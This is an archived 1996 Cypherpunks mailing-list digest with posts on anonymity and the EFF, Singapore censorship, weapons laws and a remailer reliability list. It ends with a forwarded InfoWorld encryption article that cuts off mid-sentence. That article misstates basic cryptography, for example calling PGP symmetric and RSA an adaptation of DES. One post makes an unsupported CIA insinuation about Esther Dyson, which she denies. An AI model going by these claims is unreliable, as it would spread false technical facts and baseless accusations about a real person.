In-Reply-To: Message-ID: <199609021023.UAA09571@suburbia.net> > On Sun, 1 Sep 1996, Esther Dyson wrote: > > > Now, speaking personally: I believe there are trade-offs -- which is what I > > told the LA Times. I assume I was quoted accurately (although the word > > "enforce" is awkward), but out of context. Anonymity can be dangerous -- > > as can traceability, especially in/by repressive regimes. Therefore I would > > favor allowing anonymity -- with some form of traceability only under terms > > considerably stronger than what are generally required for a wiretap. > > Anyone who seriously needs anonymity because of a repressive government is > > likely to use a foreign (outside whatever jurisdiction he fears) server, so > > that this is not a matter of "local" laws. The tracer would have to pass > > through what I hope would be tighter hoops than we have now. > > > > Please note that this is not the same as the right to *private* > > conversations and the use of encryption; this is the issue of being > > accountable for what you publish in public. > > I've left the attributation list open because I think my view a majority > one. > > The inclinations I had to be involved with or financially support EFF are, > after reading this, entirely quashed. > > What is or is not your personal or EFF's official position is meaningless. > It is clear that the personal beliefs of those involved in EFF are > those of compromise, present day politics, and a general lack of moral > fiber. > > The political assumptions and the degree of technical invasion that would > make the above scheme possible are either hopelessly naive, or insidiously > invasive. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li I agree with you whole-heartedly. I am stunned by the EFF's position on this matter and they no longer have my support. Here are some more of Dyson's statements on this subject. [http://bin-1.gnn.com/gnn/feat/dyson/index.html] [...] The EFF began very much as a civil rights "don't tread on me" kind of organization, and in a sense one of our major jobs was helping to educate law enforcement and the government. I wouldn't say that job is done, but now we also need to educate a broader population. If our motto was civil rights in cyberspace, it's now civil rights and responsibilities, because as more people come on to the Internet, they have to understand their responsibilities as well as their rights. If people don't do that, someone is going to try to come and regulate them. We are trying to create a civil society rather than a legal society in cyberspace. [...] We are strongly in favor of privacy, although there's some kind of balance required because of the need for a free press. Anonymity is a tougher one, and we actually don't have a formal position on that. The need for anonymity I agree with, but there are issues with accountability that mean it shouldn't be absolute. Examining in detail Dyson's interests it appears she maintains a sizeable and long-standing interest in Eastern European technology companies. She is also clearly very far to the right of the political spectrum (rampant capitalist would be putting it mildly). She also speaks Russian. I'm not saying she has been working for the CIA for the past decade, but I would be very surprised if the CIA has not exerted quite significant pressure (which they are easily able to do given the location of many of Dyson's assets) in order to bring her into their folds during that time period. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From dlv at bwalk.dm.com Mon Sep 2 07:06:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 22:06:21 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" In-Reply-To: Message-ID: jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Mon Sep 2 07:06:28 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 22:06:28 +0800 Subject: Free Speech and List Topics In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > More disturbing to me recently has been the steady increase in subscribers > to this list who don't seem to value free speech very highly, who write of > their own nation's censorship as valiant efforts to protect citizen-units > from foreign devils, and, even more shockingly, from supposed defenders of > electronic freedom who are now talking about the need for limits on > anonymity. The Freedom Knights are the only true defenders of True Free Speech. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pjn at nworks.com Mon Sep 2 07:22:05 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Mon, 2 Sep 1996 22:22:05 +0800 Subject: wardialer Message-ID: > Does any body know where I can get a half decent war dialer. > In> Use a websearch utility, and stop posting to cryptography-based In> mailing lists. Someone should shoot that kid and put US out of OUR misery... :) P.J. pjn at nworks.com ... Nothing is opened more often by mistake than YOUR mouth. ___ Blue Wave/QWK v2.20 [NR] From asgaard at Cor.sos.sll.se Mon Sep 2 07:26:51 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Mon, 2 Sep 1996 22:26:51 +0800 Subject: Sharp knives In-Reply-To: Message-ID: "James A. Donald" , writes: >I heard on talk.politics.guns somebody say that in Sweden they >had banned knives with a sharp point at the end, and were going >to ban sharp knives altogether. I think he was just engaging in >hyperbole, that he really meant that gun control in Sweden was >unreasonably strict, but on reflection I am not sure. There is a law in Sweden, some 5 years old, against carrying 'dangerous devices' (hunting knives, Ninja stars etc) in 'public places' (unless you are a carpenter, electrician or some such going about your business). It's okay to carry a knife when going fishing/hunting or sitting on your terrace carving totem poles. It's only a misdemeanour and might be punished with a fine, but usually the cops just use the law to disarmour street gangs on the spot. The effects of the law are dubious. Knives have come into fashion among teenagers after this legislation (but not as a consequence of it, I think). Asgaard From frissell at panix.com Mon Sep 2 08:01:52 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 2 Sep 1996 23:01:52 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <2.2.32.19960902124403.00ae6430@panix.com> At 07:06 AM 9/2/96 +0800, James Seng wrote: >that). I have a long argument with this person, telling him that despite >what they have done, i could still access to those stuff which they ban. >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. >If the people really wans it, they can get it". The flaw with this view is that it is no harder to deploy software that defeats Singapore's proxy than it is to establish a tcp/ip connection in the first place. For civilians (such as myself) establishing a tcp/ip connection is as hard or as easy as establishing an encrypted tcp/ip tunnel to defeat government control efforts. For both these tasks, I am dependent on software writers who know more than I do. Since the software of the Net is written by people not governments, the governments will find it hard to hold "free users" down to a 5% or 10% figure. The Net is nothing more than the software that it runs on and we (not governments) write the software. In addition, we are not imposing our ideology on Singapore. If Singapore changes, it will be because an encounter with the realities of the free flow of information changes it. DCF From m5 at tivoli.com Mon Sep 2 08:10:20 1996 From: m5 at tivoli.com (Mike McNally) Date: Mon, 2 Sep 1996 23:10:20 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au> Message-ID: <322AD535.3E6C@tivoli.com> James Seng wrote: > > I am not interested in politics so i didnt really know what is > happening in that case. for that, i have no comment. Gee, James, have you paused to wonder whether the presence of a truly free press might make it really difficult for a smart person like yourself to *not* find out about political prisoners? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From liberty at gate.net Mon Sep 2 08:23:31 1996 From: liberty at gate.net (Jim Ray) Date: Mon, 2 Sep 1996 23:23:31 +0800 Subject: "Always make new mistakes" Message-ID: <199609021248.IAA84818@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Esther Dyson sigfiled: ... > Esther Dyson Always make new mistakes! OK, but must we always be trying to make the same *old* ones, only in a new medium? At least there's still EPIC (for now, I'm wondering when _they_ decide to cave?). I'm feeling pessimistic. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy & Weekend Winsock Wemailer Opewator. "Whoever would overthrow the liberty of a nation must begin by subduing the freeness of speech." -- Benjamin Franklin Defeat the Duopoly! Stop the Browne-out! Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMirUhG1lp8bpvW01AQHR3QQAl9EvaUOCHnTZ0eyIa+kv41fXDJMsOC0v BUGKvnz3rfVxRTS3JiHALB93Kc1F+kSjoOd7ftM42Pod4bsreSAHJ0CInJ2Q8iYS r7Y2/opiY139YonF4WsD6IPTMA2Hfip9t8EACu0v2jIvxSCBqwa84WVrAxCijS9t qfKK8d3Xw9g= =6tBV -----END PGP SIGNATURE----- From rah at shipwright.com Mon Sep 2 08:30:05 1996 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 2 Sep 1996 23:30:05 +0800 Subject: The AI-who??? Message-ID: An admittedly leftist interpretation of recent Alaskan electorial events, for those fans of the Alaskan Independance Party... Cheers, Bob Hettinga --- begin forwarded text From: sxaeg at aurora.alaska.edu (GREENWALT ART E) (by way of rah at shipwright.com (Robert A. Hettinga)) To: rah at shipwright.com Subject: The AI-who??? Organization: University of Alaska Fairbanks Path: news-central.tiac.net!news-in.tiac.net!uunet!in3.uu.net!brighton.openmarket.com!decwrl!news.alaska.edu!aurora.alaska.edu!sxaeg Newsgroups: alt.culture.alaska Date: 29 Aug 1996 01:07:38 GMT Lines: 35 NNTP-Posting-Host: aurora.alaska.edu X-Newsreader: TIN [version 1.2 PL2] X-Newsreader: Yet Another NewsWatcher 2.1.2 Okay, okay...I know everyone has been sitting on the edge of their privy seats wondering how the Rent-A-Party (aka "The Sub-Arctic Titanic of Politics") fared in the recent primaries here in the Interior, so here goes. Now, keep something in mind as you read these results: the Interior is the heart of the Rent-A-Party. Der Fuhrer Vogel "graced" us with his presence and as the infirmities of advancing age took their toll, he devised the party back in the mid-70's here in the Interior. So...you should think the bastion, the stronghold, Yea, Brethren and Sistren!, the very for-r-r-r-rtress of AIP-ity would be...the INTERIOR! Amen! The AIP fielded 1 candidate here on the Fairbanks ballots: Paul Chizmar. He finished last. Indeed, surpassing even the last performance of the party when they dropped from their 1990 high of 39% of the vote to their 1994 basement 13% of the vote, we now see them seeking subterranean levels as their sole candidate on the entire ballot received *barely* 11% of the vote! Right here! In the Interior! Just about 15 miles from Lynette and Dexter Clarke, the penultimate-Grand Poobahs of Das Partie! Tsk.... I tell ya, folks...I love to watch "Rocky and Bullwinkle", "Monty Python", "The 3 Stooges", the "Little Rascals", etc. But when the AIP finally dwindles/splinters/transmogrifies into its final bit of light and then that little glimmer goes out....I will have lost one of my greatest sources of amusement Alaska has ever offered me. Sigh.... .....Art, who will just have to watch more 3 Stooges and see if he can tell which one is Joe... --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From raph at CS.Berkeley.EDU Mon Sep 2 09:36:11 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 3 Sep 1996 00:36:11 +0800 Subject: List of reliable remailers Message-ID: <199609021350.GAA03391@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'nymrod'} = ' alpha pgp'; $remailer{"lead"} = " cpunk pgp hash latent cut ek"; $remailer{"nemesis"} = " cpunk pgp hash latent cut"; $remailer{"exon"} = " cpunk pgp hash latent cut ek"; $remailer{"vegas"} = " cpunk pgp hash latent cut"; $remailer{"haystack"} = " cpunk mix pgp hash latent cut ek"; $remailer{"ncognito"} = " mix cpunk pgp hash latent"; $remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek"; $remailer{"jam"} = " cpunk mix pgp hash latent cut ek"; $remailer{"winsock"} = " cpunk pgp hash cut ksub reord"; $remailer{'nym'} = ' newnym pgp'; $remailer{"balls"} = " cpunk pgp hash latent cut ek"; $remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek"; $remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord"; $remailer{'cyber'} = ' alpha pgp'; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (cyber mix) The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver. The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details. 403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now. The penet remailer is closed. Last update: Mon 2 Sep 96 6:45:14 PDT remailer email address history latency uptime ----------------------------------------------------------------------- mix mixmaster at remail.obscura.com -+++++-+++++ 1:38:18 99.98% jam remailer at cypherpunks.ca .*****-+**+* 28:42 99.98% exon remailer at remailer.nl.com ***--**+**** 3:33 99.98% squirrel mix at squirrel.owl.de +-+------.+ 2:37:06 99.96% cyber alias at alias.cyberpass.net +-+*+** 38:49 99.96% middle middleman at jpunix.com ---- --+++ 55:25 99.69% replay remailer at replay.com +* *-**+*** 6:15 99.36% amnesia amnesia at chardos.connix.com - -----+--- 3:24:36 99.35% lead mix at zifi.genetics.utah.edu +++--+-+++++ 48:39 99.23% winsock winsock at c2.org - -----+-- 5:46:31 98.94% balls remailer at huge.cajones.com # **-**+**** 5:32 98.70% nemesis remailer at meaning.com ****- ++**** 23:48 98.46% extropia remail at miron.vip.best.com -..------ 4:55:14 94.02% haystack haystack at holy.cow.net *#* ##+### 10:59 90.11% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From qut at netcom.com Mon Sep 2 09:40:06 1996 From: qut at netcom.com (Dave Harman OBC) Date: Tue, 3 Sep 1996 00:40:06 +0800 Subject: Sharp Knives In-Reply-To: Message-ID: <199609021338.GAA29868@netcom21.netcom.com> ! "James A. Donald" , writes: ! >I heard on talk.politics.guns somebody say that in Sweden they ! >had banned knives with a sharp point at the end, and were going ! >to ban sharp knives altogether. I think he was just engaging in ! >hyperbole, that he really meant that gun control in Sweden was ! >unreasonably strict, but on reflection I am not sure. ! ! There is a law in Sweden, some 5 years old, against carrying ! 'dangerous devices' (hunting knives, Ninja stars etc) in 'public ! places' (unless you are a carpenter, electrician or some such ! going about your business). It's okay to carry a knife when ! going fishing/hunting or sitting on your terrace carving totem poles. ! It's only a misdemeanour and might be punished with a fine, ! but usually the cops just use the law to disarmour street gangs ! on the spot. The effects of the law are dubious. Knives have come ! into fashion among teenagers after this legislation (but not as ! a consequence of it, I think). In California, it's a felony to merely *own* a Ninja star. It's a felony to carry a *concealed* knife, but carrying it openly in a holster is legal. It's a felony for most people to carry a concealed loaded handgun on the street only on a *second* offense. It'a a felony to merely *own* a switchblade, brass knuckles, etc. Do our weapons laws sound strange? Are many of our weapons laws stricter than countries like Sweden? Yes! From frogfarm at yakko.cs.wmich.edu Mon Sep 2 10:05:42 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Tue, 3 Sep 1996 01:05:42 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <199609021023.UAA09571@suburbia.net> Message-ID: <199609021354.JAA13057@yakko.cs.wmich.edu> > Examining in detail Dyson's interests it appears she maintains a > sizeable and long-standing interest in Eastern European technology > companies. She is also clearly very far to the right of the political > spectrum (rampant capitalist would be putting it mildly). She also speaks > Russian. And all these would certainly be excellent reasons to denounce her as an enemy of liberty, now wouldn't they. [CIA snip] > "Of all tyrannies a tyranny sincerely exercised for the good of its victims > may be the most oppressive. It may be better to live under robber barons > than under omnipotent moral busybodies, The robber baron's cruelty may > sometimes sleep, his cupidity may at some point be satiated; but those who > torment us for own good will torment us without end, for they do so with > the approval of their own conscience." - C.S. Lewis, _God in the Dock_ So what's wrong with her being an Evil Capitalist(tm) again? -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information "We think people like seeing somebody in a uniform on the porch." -US Postal spokeswoman, quoted in AP, 1/27/96. I don't know about you, but most people I know who saw someone in uniform on their porch would pull out the shotgun... From grafolog at netcom.com Mon Sep 2 11:14:01 1996 From: grafolog at netcom.com (jonathon) Date: Tue, 3 Sep 1996 02:14:01 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au> Message-ID: On Mon, 2 Sep 1996, James Seng wrote: > You dont go to jail for writing articles. You might be sue for deframation > if you published something untrue (similar to your civil lawsuit i guess?) So what happens if somebody in Singapore publishes a list of Singaporians who beat up Chinese immigrants the previous week. > and have to pay large sum of money to the person but you dont go to jail. If the person who publishes the list of Singaporians who beat up Chinese immigrants the previous week is not in jail for publishing that, then what is he in jail for? The individual is publishing factual data, just data that the Singapore government has been trying very hard to keep out of the hands of the population of Singaporians in specific, and the world in general. > >a government that can keep the leader of an opposition political party > >in jail for years just because he opposes them is pretty corrupt. > I am not interested in politics so i didnt really know what is happening in > that case. for that, i have no comment. IOW, you don't give a damm about freedom of speech -- which is what I suspected was the case all along. You're just one of those people who says pretty words, without meaning them. > Very true. So does the First Amendment said. Singapore does have such > similar law as First Amendment which is slight "modified". You have freedom > of speech as long as your comments does not endanger religious/racist > harmony and national security. (I do not know the exact term..need a lawyer National security is a hole that makes a mockery of anything which allegedly protects freedom of speech. The slight modification in Singapore's freedom of speech law means that all speech is acceptable, so long as the writer first self-censors, and secondly doesn't offend any jerks in Singapore, and thirdly doesn't offend any jerks in the neighbouring countries, and fourthly doesn't offend the current despot in Singapore. << A statment which makes this message illegal to carry through the internet. >> Still want to claim that Singapore practices freedom of speech? Or do you want me to start citing religious, political and serious literary works of merit that are prohibited under Singapore's alleged freedom os speech statute, that bans any speech that might be controversial? xan jonathon grafolog at netcom.com However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart From tbyfield at panix.com Mon Sep 2 11:19:16 1996 From: tbyfield at panix.com (tbyfield at panix.com) Date: Tue, 3 Sep 1996 02:19:16 +0800 Subject: American Imperialism, Firing Squads, and the Vincennes Shootdown In-Reply-To: Message-ID: <199609021514.LAA12830@mail2.panix.com> Timothy C. May) wrote: > At 1:03 AM 9/2/96, Alan Horowitz wrote: > >The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > > > >If my memory serves, the Iranian jetliner had its squawker turned off, or > >broken. The officer in charge in the CIC had about ten seconds to decide > >if he was about to be locked-on by a missle. And no real information to > >make the decision with. > > The U.S.S. Vincennes shot down an Iranian commercial airliner that was in > its normal and well-known flight path out of Bandar Abbas. <...> > > As to the "squawker" being turned off, this is not my recollection of the > case (though it was nearly a decade ago, so memories fade...). If memory serves, the disinfo campaign following the Airbus incident put much emphasis on the plane's (allegedly) erratic, seemingly hostile behavior: it was said to be menacing a specific US ship in the convoy. It later turned out, I think, that the ship being menaced was a radar ghost fabricated by the Vincennes's AEGIS system. \t From frissell at panix.com Mon Sep 2 11:33:28 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 3 Sep 1996 02:33:28 +0800 Subject: PLEASE Nuke Singapore Back into the Stone Age Message-ID: <2.2.32.19960902151654.00abd6ac@panix.com> At 05:51 PM 9/1/96 -0700, Timothy C. May wrote: >Who says this has anything to do with "American ideology"? The Usenet is >propagated around the world. All we are saying is that honest commentary on >the corruption of Lee Kwan Yew (and his billion dollars in Australian and >European banks) will be reported on the Usenet. > >This is not "imposing American ideology" on anyone. Didn't you know that TCP/IP was an attempt by American Intelligence Agencies in concert with Britain to impose Anglo-American values (free trade in goods and bits) on the poor Mittel Europeans and the followers of Confucius in the East. These sinister British-American conspirators had done so well with their earlier releases of blue jeans, Rock and Roll, and Coca Cola. TCP/IP was designed to be the final blow to Central Europe and Asia in a culture ware that has dominated this century. Pretty sneaky those Anglo Saxons. DCF "Course if Mittel Europeans and Confucians hadn't murdered 100 million people or so in the 20th century, perhaps we could feel sorry for them." (The US-UK alliance only murdered a few million mostly via mass bombing of civilians during WWII.) From edyson at edventure.com Mon Sep 2 11:39:37 1996 From: edyson at edventure.com (Esther Dyson) Date: Tue, 3 Sep 1996 02:39:37 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <19960902152515012.AAA179@Esther.edventure.com> At least you don't accuse me of being a Communist. For the record, I am not a tool of the CIA nor have they pressured me, but there's no reason for you to believe me. Esther Dyson At 08:23 PM 9/2/96 +1000, Julian Assange wrote: SNIP --- > >Examining in detail Dyson's interests it appears she maintains a >sizeable and long-standing interest in Eastern European technology >companies. She is also clearly very far to the right of the political >spectrum (rampant capitalist would be putting it mildly). She also speaks >Russian. I'm not saying she has been working for the CIA for the past >decade, but I would be very surprised if the CIA has not exerted quite >significant pressure (which they are easily able to do given the >location of many of Dyson's assets) in order to bring her into their >folds during that time period. > >-- >"Of all tyrannies a tyranny sincerely exercised for the good of its victims > may be the most oppressive. It may be better to live under robber barons > than under omnipotent moral busybodies, The robber baron's cruelty may > sometimes sleep, his cupidity may at some point be satiated; but those who > torment us for own good will torment us without end, for they do so with > the approval of their own conscience." - C.S. Lewis, _God in the Dock_ >+---------------------+--------------------+----------------------------------+ >|Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | >|proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | >|proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | >+---------------------+--------------------+----------------------------------+ > Esther Dyson Always make new mistakes! EDventure Holdings 1 (212) 924-8800 1 (212) 924-0240 fax 104 Fifth Avenue New York, NY 10011 USA www.edventure.com High-Tech Forum in Lisbon, October 27-29, 1996 PC Forum in Tucson, Arizona, March 23-26, 1997 From cmcurtin at research.megasoft.com Mon Sep 2 11:39:57 1996 From: cmcurtin at research.megasoft.com (C Matthew Curtin) Date: Tue, 3 Sep 1996 02:39:57 +0800 Subject: Terrible story on crypto in InfoWorld Message-ID: <199609021327.JAA06854@goffette.research.megasoft.com> There's a story covering crypto in this weeks' InfoWorld Electric. Since it's a members-only thing, I'll include the text here, as well as my response to it. I'm hoping that they'll take the article down and take up my offer to provide a better replacement. I suspect that the problem here is that someone was given a subject and a deadline, and told to "go for it." The requisite background for getting clued on crypto is probably significantly longer than the amount of time allowed by the deadline. I suspect that the issue was further clouded by the crypto-clued people she talked to during the research speaking directly about what they're doing, without giving any sort of analogies to make the ideas click and make sense. I hope that my illustration of the bicycle lock serves to clear up the confusion... In any event, we've all got a lot of work to do. I think we should take it upon ourselves to not only talk about crypto and why it's such a Good Thing(tm), but also to *educate* people to help them understand what in the world we're talking about. -matt ------------------------ begin silly article ------------------------- [Image] [PageOne] [Search] [Reader Service] [Ads Services] [Overview Map] [Todays News Logo] [Opinions] [Forums] [Test Center] [Calendar] [This Week In Print[Week In Review] Encryption technology can help secure private data over public carriers, but tackling its own issues is another story By Julie Bort InfoWorld Electric Think about this: Every time one of your end-users sends an electronic communication from your network, it opens the door to an attack. It is unbelievably easy for a knowledgeable hacker to exploit the failings of SMTP and other communications protocols to eavesdrop on Internet e-mail, send phony messages, or even gain access to other networked systems, security consultants say. A domain name or single IP address is the only information needed, and from there the door is wide open for other mischief. One increasingly popular way to plug this gaping hole is to encrypt e-mail and other electronic communications. Encryption is a way to encode text using complex mathematical algorithms. "When explaining encryption, I like to use the analogy of the Cap'n Crunch Super Secret Decoder Rings. These rings [distributed in Cap'n Crunch cereal boxes in the 1960s] contained a very simple algorithm. It was something like `take a letter then add 5.' So an A became an F. Simply speaking, that's all these algorithms are, mathematical formulas," explains Gary Fresen, a member of the American Bar Association's committee on digital signatures and an attorney and partner at Baker McKenzie LLP, in Chicago, one of the world's largest law firms. Although no encryption algorithm is in and of itself crack-proof, several of them are so complex that they are virtually unbreakable. Coupled with proper implementation, authentication, and secure connections, encryption solutions can add a high level of security to any company's arsenal. However, it is an area that requires a knowledgeable person to make the purchasing decision because the technology is very complex, the best product selected will add a level of administration overhead, and numerous industry consortiums are developing competing APIs. NUMEROUS USES. Is encryption security overkill? Absolutely not, say users who have already adopted it or are in the processing of adopting it. One reason is to gain some security control over public telecommunications lines used in wide area networks. "We have a good idea of our internal security, but we also use the public carriers for our worldwide WAN, such as CompuServe [Inc.'s] frame relay and British Telecom [Plc.'s] frame relay, and we [don't control] their level of security," says Richard Perlotto, corporate network security manager for VLSI Technology Inc., in Tempe, Ariz. "Even if you own most of your own equipment, with frame relay you don't own the router, the carrier does. Frequently [the carrier has] modems attached to those routers to manage the equipment remotely," Perlotto adds. Those modems can allow hackers to tap in and grab data as it is being transmitted, without ever being detected by the company's security systems. Consequently, VLSI is currently evaluating encryption boxes and other products that sit on either end of a connection, such as NetFortress from Digital Secured Networks Technology Inc. (DSN), in Englewood Cliffs, N.J. One box encodes all traffic on the fly when it's being transmitted, and the other decodes the information upon receipt. Router vendors offer similar add-ons. Besides simply letting employees sleep better at night with the knowledge that their corporate secrets are safe, encryption technology can mean that a company can operate more efficiently and cost-effectively, users say. "Right now, we drop letters into the post office, which isn't very secure when you think about it," Fresen says. "After all, anyone could look at them. Or we send a courier. But if we can secure our [Lotus Development Corp.] cc:Mail system, there's a tremendous cost savings to us compared to sending a courier to Hong Kong three times a day. And we'll be able to do things in a day that used to take a week." Fresen is currently testing Entrust 2.0 from Northern Telecom Ltd. (NorTel), in Research Triangle Park, N.C., as an encryption add-on to e-mail. GETTING KEYED IN. But before you can go out and purchase an encryption system, you need to do some serious homework. Encryption involves multiple technologies, competing protocols, and complex mathematics. You can start the learning process by understanding the two components that make up most encryption systems: the key and the certificate. The key is the algorithm or mathematical formula that encodes the message itself. It must be sent to the message recipient so the message can be decoded, hence the term key. The size of the key, measured in bits, determines how complex the algorithm is and how tough the code is to crack. The state of the art for encryption technology used exclusively within the United States is 1,024 bits. However, the maximum size key that is allowed to be exported is 40 bits. Keys come in two flavors: symmetrical, or public key model; and asymmetrical, or public key/private key model. A symmetrical key uses the same algorithm to encode and decode a message. This is the technique used by the public key encryption program Pretty Good Privacy (PGP). PGP assumes what security experts call the peer trust model. That is, the sender knows and trusts the receiver and is therefore perfectly comfortable in sending the key on its way. Herein lies the "pretty good" part of the privacy. Although the algorithm itself makes the message difficult to crack, the key exchange is only pretty good when compared with other methods. On the other hand, the great advantage to PGP is that it creates no key management overhead, which is the biggest drawback of asymmetrical keys. In the asymmetrical model, users have a public key stored somewhere that is available. Should someone want to send an encrypted message, the sender locates the public key of the recipient, encodes the message, and sends it off. The receiver then uses a private key to decode the message. The private key is different from the public key, but they are mathematically linked so that the private key is capable of decoding the message. Asymmetrical systems require no trust between the sender and the recipient. That's good. But they do create administration overhead in the form of storing and maintaining public and private keys. Public/private key exchange is the technique used by RSA Data Security Inc., which was recently sold to Security Dynamics Inc., in Bedford, Mass. RSA uses a technology that is actually an adaptation of the decade-old National Institute of Standards and Technology's peer-trust Data Encryption Standard (DES), still used in many products. DES is a method of grabbing random keys for each encryption task, rather than using the same key repeatedly. Cryptographers say that RSA solves some problems, such as the trust issue but generates others. "Say I want to send a secure message. The first thing I do is take a random key and encrypt the message with it," says Paul Kocher, an independent cryptography consultant in Menlo Park, Calif., and one of the people responsible for discovering the flaw in the security of Netscape Communication Corp.'s Netscape Navigator. "But without that key, I won't know how to decode [the message], so I take an RSA public key and encrypt the random DES key with my recipient's public key. The recipient uses a private RSA key to decrypt the DES key. If it sounds convoluted, it is. RSA is very slow and cumbersome. DES is fast and efficient, but it doesn't give you 